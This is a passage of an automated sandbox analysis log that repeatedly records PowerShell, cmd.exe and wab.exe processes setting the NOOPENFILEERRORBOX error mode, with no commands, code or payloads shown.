              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
